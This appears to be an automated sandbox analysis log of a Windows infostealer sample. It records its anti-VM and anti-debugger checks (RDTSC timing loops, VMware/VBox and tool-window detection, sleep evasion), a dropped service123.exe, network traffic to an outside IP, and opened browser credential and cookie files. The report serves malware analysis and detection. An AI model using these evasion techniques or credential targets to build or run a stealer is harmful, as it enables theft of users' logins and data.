Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511EC second address: 6E511F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511F2 second address: 6E5121E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD5E912D9F7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51364 second address: 6E513B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+24h], eax 0x0000000c jmp 00007FD5E9559C86h 0x00000011 mov eax, dword ptr [esi+28h] 0x00000014 jmp 00007FD5E9559C80h 0x00000019 mov dword ptr [edx+28h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f call 00007FD5E9559C7Ch 0x00000024 pop ecx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E513B2 second address: 6E51436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FD5E912D9F1h 0x0000000b mov bl, ah 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov ecx, dword ptr [esi+2Ch] 0x00000012 jmp 00007FD5E912D9F8h 0x00000017 mov dword ptr [edx+2Ch], ecx 0x0000001a pushad 0x0000001b movzx esi, dx 0x0000001e pushfd 0x0000001f jmp 00007FD5E912D9F3h 0x00000024 or ax, C5CEh 0x00000029 jmp 00007FD5E912D9F9h 0x0000002e popfd 0x0000002f popad 0x00000030 mov ax, word ptr [esi+30h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD5E912D9EDh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51436 second address: 6E51446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E9559C7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51446 second address: 6E5144A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5144A second address: 6E51469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c pushad 0x0000000d mov edx, 6B102790h 0x00000012 mov ecx, edi 0x00000014 popad 0x00000015 mov ax, word ptr [esi+32h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51469 second address: 6E5146D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5146D second address: 6E51473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51473 second address: 6E514D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FD5E912D9F4h 0x00000014 sub cx, 8638h 0x00000019 jmp 00007FD5E912D9EBh 0x0000001e popfd 0x0000001f jmp 00007FD5E912D9F8h 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+34h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E514D4 second address: 6E514D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E514D9 second address: 6E514E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 7FF7686Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E514E3 second address: 6E51519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [edx+34h], eax 0x0000000a pushad 0x0000000b jmp 00007FD5E9559C7Ah 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 mov ecx, 784F940Dh 0x00000018 popad 0x00000019 popad 0x0000001a test ecx, 00000700h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD5E9559C7Fh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51519 second address: 6E515EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD5E912D9EFh 0x00000009 or ecx, 515D236Eh 0x0000000f jmp 00007FD5E912D9F9h 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jne 00007FD6579DBBABh 0x00000021 jmp 00007FD5E912D9F3h 0x00000026 or dword ptr [edx+38h], FFFFFFFFh 0x0000002a jmp 00007FD5E912D9F6h 0x0000002f or dword ptr [edx+3Ch], FFFFFFFFh 0x00000033 jmp 00007FD5E912D9F0h 0x00000038 or dword ptr [edx+40h], FFFFFFFFh 0x0000003c jmp 00007FD5E912D9F0h 0x00000041 pop esi 0x00000042 pushad 0x00000043 pushad 0x00000044 mov dh, 84h 0x00000046 mov ax, 89BBh 0x0000004a popad 0x0000004b popad 0x0000004c pop ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007FD5E912D9F6h 0x00000056 jmp 00007FD5E912D9F5h 0x0000005b popfd 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E515EA second address: 6E515F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6EA0C41 second address: 6EA0C83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A3EAh 0x00000007 mov dh, 14h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 pushfd 0x00000013 jmp 00007FD5E912D9F4h 0x00000018 adc ecx, 294EAFD8h 0x0000001e jmp 00007FD5E912D9EBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a movzx esi, dx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E40826 second address: 6E4082C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E4082C second address: 6E40832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E40832 second address: 6E40836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E40836 second address: 6E4083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E4083A second address: 6E40871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ah, bl 0x0000000d pushfd 0x0000000e jmp 00007FD5E9559C7Eh 0x00000013 or si, 61E8h 0x00000018 jmp 00007FD5E9559C7Bh 0x0000001d popfd 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push ebx 0x00000024 pop esi 0x00000025 push edi 0x00000026 pop eax 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE001D second address: 6DE006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD5E912D9EEh 0x00000009 sbb al, 00000018h 0x0000000c jmp 00007FD5E912D9EBh 0x00000011 popfd 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FD5E912D9F0h 0x00000020 sub cx, CD78h 0x00000025 jmp 00007FD5E912D9EBh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d mov ecx, 35CF8045h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE006F second address: 6DE007D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE007D second address: 6DE0081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0081 second address: 6DE0085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0085 second address: 6DE008B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE008B second address: 6DE00E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 mov dx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007FD5E9559C84h 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushfd 0x0000001a jmp 00007FD5E9559C83h 0x0000001f xor cx, 3FFEh 0x00000024 jmp 00007FD5E9559C89h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE00E7 second address: 6DE00ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE00ED second address: 6DE00F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A0A second address: 6DE0A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A0E second address: 6DE0A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A14 second address: 6DE0A1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 6Ah 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A1B second address: 6DE0A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD5E9559C7Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A33 second address: 6DE0A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A39 second address: 6DE0A4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E9559C7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A4A second address: 6DE0A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD5E912D9F8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A6F second address: 6DE0A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FD5E9559C86h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A9D second address: 6DE0AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0AA1 second address: 6DE0ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E30911 second address: 6E30917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E30917 second address: 6E30950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FD5E9559C83h 0x00000011 call 00007FD5E9559C88h 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Special instruction interceptor: First address: 94FA4C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Special instruction interceptor: First address: AF78E1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Special instruction interceptor: First address: 94D656 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Special instruction interceptor: First address: AF6072 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Special instruction interceptor: First address: B7FC03 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window / User API: threadDelayed 1182
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window / User API: threadDelayed 1180
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window / User API: threadDelayed 1242
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 3174
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 6825
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.2 %
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 5692 Thread sleep count: 31 > 30
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 5692 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 5484 Thread sleep count: 1182 > 30
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 5484 Thread sleep time: -2365182s >= -30000s
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 2336 Thread sleep count: 1180 > 30
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 2336 Thread sleep time: -2361180s >= -30000s
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 2292 Thread sleep count: 1242 > 30
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe TID: 2292 Thread sleep time: -2485242s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 60 Thread sleep count: 3174 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 60 Thread sleep time: -317400s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 60 Thread sleep count: 6825 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 60 Thread sleep time: -682500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\.ms-ad\
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: nRYpZg6i5E.exe, 00000000.00000003.1475317140.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863882160.000002108C558000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: nRYpZg6i5E.exe, 00000000.00000003.1479119011.00000000066D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlK'-`
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: NTICE
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: SICE
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: SIWVID
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00968230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_00968230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_0096116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 9_2_0096116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_009611A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_009611A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00961160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_00961160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_009613C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 9_2_009613C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BEC84D0 cpuid 9_2_6BEC84D0
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 9.2.service123.exe.6be40000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 1204, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.11:49707 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
